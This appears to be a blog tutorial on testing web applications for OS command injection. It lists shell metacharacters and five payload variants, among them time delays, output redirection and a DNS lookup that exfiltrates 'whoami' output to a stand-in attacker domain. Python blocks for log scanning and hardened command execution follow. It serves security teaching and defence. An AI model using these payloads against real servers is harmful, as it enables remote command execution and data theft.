Testing For OS Command Injection

Shardul Borkar
4 min read · Apr 3, 2021

OS Command Injection is a critical class of vulnerability. It allows an attacker to remotely execute code or commands on a vulnerable server, which often leads to complete compromise of that server.

OS Command injection is most often used to execute unauthorized OS commands on the targeted system (usually a web server) and degrade its performance. The flaw exists when an application fails to properly validate and sanitize the parameters it passes to shell functions such as system() or exec() when executing system commands. An attacker who controls those parameters can trick the application into executing any system command of their choice.

Impact of OS Command Injection:

  • The attacker can alter or corrupt the database, steal the customer’s records, or, in some cases, launch a Distributed Denial of Service (DDoS) attack.
  • An attacker gaining access to a shell terminal can lead to the disclosure of files not normally reachable from the web, and to privilege escalation attacks against the server.
  • An attacker can leverage an OS command injection vulnerability to compromise other parts of the hosting infrastructure, exploiting trust relationships to pivot the attack to other systems within the organization.

How to Find Command Injection:

Any endpoint of a web application that lets the user enter an input value that is processed by a backend server is a valid starting point for finding any sort of injection point.

Useful metacharacters to test for Command Injection (different ways of injecting OS commands):

  • ; The semicolon is the most common metacharacter used to test for an injection flaw. The shell runs all the commands separated by semicolons in sequence.
  • & Separates multiple commands on one command line. It runs the first command, then the second command.
  • && Runs the command following && only if the preceding command is successful.
  • | The pipe passes the output of the first command into the second command.
  • || Redirects the standard outputs of the first command to the standard input of the second command.
  • ` The backtick is used to force the shell to interpret and run the command between backticks. Following is an example of this: variable="OS version `uname -a`" && echo $variable
  • () The brackets are used to nest commands.
  • # The hash is used as a command-line comment.

Testing for OS Command Injections:

OS command injection comes in many variants; the following are the common cases.

Variant 1: Simple Case

Payload: |uname -a

Description: This command will print basic system information.

Variant 2: Blind OS command injection using time delays:

Payload: ||ping+-c+20+127.0.0.1||

Description: This command will cause the application to ping its loopback network adapter for 20 seconds.

Variant 3: Blind OS command injection by redirecting output:

Payload: ||whoami>/var/www/images/output.txt||

Description: If the application serves static resources from the file system location /var/www/images/, then this payload can be submitted. The > character writes the output of the whoami command to the specified file. You can then use the application to fetch output.txt and view the output of the injected command.

Variant 4: Blind OS command injection using out-of-band techniques:

Payload: ||nslookup+webattacker.com||

Description: The payload uses the nslookup command to cause a DNS lookup for the specified domain.

Variant 5: Blind OS command injection with out-of-band data exfiltration

Payload: ||nslookup+`whoami`.webattacker.com||

Description: The above payload will cause a DNS lookup to the attacker’s domain containing the result of the whoami command.
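As an added example (not part of the original post), the following Python scans constructed web-server access-log lines for the metacharacters listed earlier and for the shapes of the five blind-injection variants above. The log format, the parameter name, the regexes and the sample lines are all assumptions made for this example; the comment beside each metacharacter notes what a POSIX shell actually does with it, which is the detail a defender needs when deciding how dangerous a given character is.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Shell metacharacters from the list above, each with what a POSIX shell
# actually does with it (these notes are ours, not the post's).
METACHARS = {
    ";": "runs the commands on either side in sequence",
    "&&": "runs the second command only if the first succeeded",
    "&": "runs the first command in the background, then the second",
    "||": "runs the second command only if the first failed",
    "|": "pipes stdout of the first command into stdin of the second",
    "`": "command substitution (backticks)",
    "$(": "command substitution",
    "(": "grouping / subshell",
    ")": "grouping / subshell",
    "#": "comment: the rest of the line is ignored",
    ">": "redirects stdout to a file",
}

# Shapes of the blind-injection variants above. Constructed regexes that
# catch the post's payloads; they are a starting point, not a complete WAF.
VARIANT_PATTERNS = {
    "time-delay": re.compile(r"\b(?:ping\s+-c\s+\d+|sleep\s+\d+)", re.I),
    "output-redirect": re.compile(r">\s*/var/www/", re.I),
    "out-of-band-dns": re.compile(r"\b(?:nslookup|dig|host)\s+\S+", re.I),
}


def scan_value(value):
    """Return (kind, detail) findings for one URL-decoded parameter value."""
    findings = []
    remaining = value
    # Longest tokens first, so '||' is reported once rather than as two '|'.
    for token in sorted(METACHARS, key=len, reverse=True):
        if token in remaining:
            findings.append(("metachar", token))
            remaining = remaining.replace(token, " ")
    for label, pattern in VARIANT_PATTERNS.items():
        if pattern.search(value):
            findings.append(("variant", label))
    return findings


def scan_request(log_line):
    """Parse one line of the constructed 'METHOD TARGET STATUS' log, decode the
    query string and scan every parameter. Returns {param: findings}."""
    _method, target, _status = log_line.split(" ", 2)
    hits = {}
    # parse_qsl undoes both '+' and %XX encoding, which is what the server's
    # framework hands to the code that builds the command.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        findings = scan_value(value)
        if findings:
            hits[name] = findings
    return hits


def flagged_lines(lines):
    """Return [(line, hits)] for every log line with at least one finding."""
    out = []
    for line in lines:
        hits = scan_request(line)
        if hits:
            out.append((line, hits))
    return out


# Constructed sample access-log lines: one benign request, then the post's
# payloads URL-encoded the way a browser or proxy would send them.
SAMPLE_LOG = [
    "GET /ping?host=10.0.0.5 200",
    "GET /ping?host=10.0.0.5%3Bwhoami 200",
    "GET /ping?host=%7Cuname+-a 200",
    "GET /ping?host=%7C%7Cping+-c+20+127.0.0.1%7C%7C 200",
    "GET /ping?host=%7C%7Cwhoami%3E/var/www/images/output.txt%7C%7C 200",
    "GET /ping?host=%7C%7Cnslookup+webattacker.com%7C%7C 200",
    "GET /ping?host=%7C%7Cnslookup+%60whoami%60.webattacker.com%7C%7C 200",
]

if __name__ == "__main__":
    for line, hits in flagged_lines(SAMPLE_LOG):
        print(line)
        for name, findings in hits.items():
            for kind, detail in findings:
                note = METACHARS.get(detail, "") if kind == "metachar" else ""
                print("  %s: %s %s %s" % (name, kind, detail, note))
```

Running the block prints the six flagged lines with the operator or variant that triggered each finding; the benign first line produces nothing. The scanner works on decoded values because that is the form in which the application sees them, so a `%7C` in the raw log is the same `|` to the shell.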

Prevention:

The most effective way to prevent OS command injection vulnerabilities is to never call out to OS commands from application-layer code.

If it is considered unavoidable to call out to OS commands with user-supplied input, then strong input validation must be performed. Also, never attempt to sanitize input by escaping shell metacharacters.
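Added example, not the author's code: the vulnerable pattern beside the hardened one in Python. The feature (a "ping a host" endpoint), the allowlist regex and the function names are assumptions made for this example; `shlex` is used only to show how a shell would split the concatenated string, and the hardened path never hands the value to a shell at all.

```python
import re
import shlex
import subprocess

# Allowlist for the only value this feature needs: an IPv4 address or a
# hostname made of dot-separated labels. Constructed for this example; adapt
# it to the exact value set your own feature accepts.
HOST_RE = re.compile(
    r"^(?=.{1,253}$)"
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def build_unsafe_command(host):
    """VULNERABLE pattern: the user value is concatenated into one string that
    the application would hand to a shell (subprocess with shell=True).
    Returned rather than executed so the effect can be inspected."""
    return "ping -c 1 " + host


def shell_would_see(command):
    """Tokenise a command string roughly the way a POSIX shell would, using
    shlex in punctuation mode. Approximation only: shlex is not a shell, but
    it is enough to show where injected operators split the command line."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    return list(lexer)


def build_safe_argv(host):
    """HARDENED pattern: validate against the allowlist first, then build an
    argv list. With a list and shell=False no shell ever parses the value, so
    metacharacters in it are just bytes of one argument."""
    if not HOST_RE.match(host):
        raise ValueError("rejected host value: %r" % host)
    return ["ping", "-c", "1", host]


def run_hardened(host, timeout=10):
    """Validate, then execute without a shell. Returns the CompletedProcess."""
    return subprocess.run(build_safe_argv(host), shell=False,
                          capture_output=True, text=True, timeout=timeout)


if __name__ == "__main__":
    injected = "127.0.0.1;whoami"  # constructed attacker-style value
    print(shell_would_see(build_unsafe_command(injected)))
    # the shell sees two commands: ['ping', '-c', '1', '127.0.0.1', ';', 'whoami']
    try:
        build_safe_argv(injected)
    except ValueError as exc:
        print("hardened path:", exc)
    print(build_safe_argv("127.0.0.1"))
```

The two defences are independent and should both be present: the allowlist rejects anything that is not a hostname, and the argv list means that even a value which slipped past validation would reach `ping` as a single argument rather than being parsed by `/bin/sh`. Escaping metacharacters while keeping `shell=True`, which the text warns against, only protects against the characters you remembered to escape.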
